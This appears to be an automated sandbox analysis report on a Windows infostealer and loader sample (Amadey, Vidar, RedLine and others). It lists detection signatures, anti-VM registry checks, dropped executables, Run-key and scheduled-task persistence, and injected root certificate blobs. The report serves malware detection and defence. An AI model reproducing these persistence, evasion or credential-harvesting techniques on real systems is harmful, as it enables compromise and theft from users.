Malware Analysis Report

2025-04-03 09:23

Sample ID 250305-eqsh1sym12
Target fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe
SHA256 fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
Tags
amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan redline testproliv credential_access infostealer pyinstaller upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7

Threat Level: Known bad

The file fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe was found to be: Known bad.

Malicious Activity Summary

amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan redline testproliv credential_access infostealer pyinstaller upx

RedLine

Redline family

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Vidar family

Detects SvcStealer Payload

Detect Vidar Stealer

SystemBC

Vidar

Svcstealer family

SvcStealer, Diamotrix

Amadey family

Systembc family

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Uses browser remote debugging

Reads user/profile data of web browsers

.NET Reactor proctector

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of local email clients

Identifies Wine through registry keys

Loads dropped DLL

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of UnmapMainImage

Checks processor information in registry

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 04:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 04:09

Reported

2025-03-05 04:11

Platform

win7-20250207-en

Max time kernel

149s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1548 created 1180 N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe C:\Windows\Explorer.EXE

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\wwasfxe\orhct.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\wwasfxe\orhct.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\wwasfxe\orhct.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe N/A
N/A N/A C:\ProgramData\wwasfxe\orhct.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\ProgramData\wwasfxe\orhct.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\baabdababbec = "\"C:\\ProgramData\\baabdababbec.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\faeba77a20.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\faeba77a20.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1932 set thread context of 1264 N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\futors.job C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\wwasfxe\orhct.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
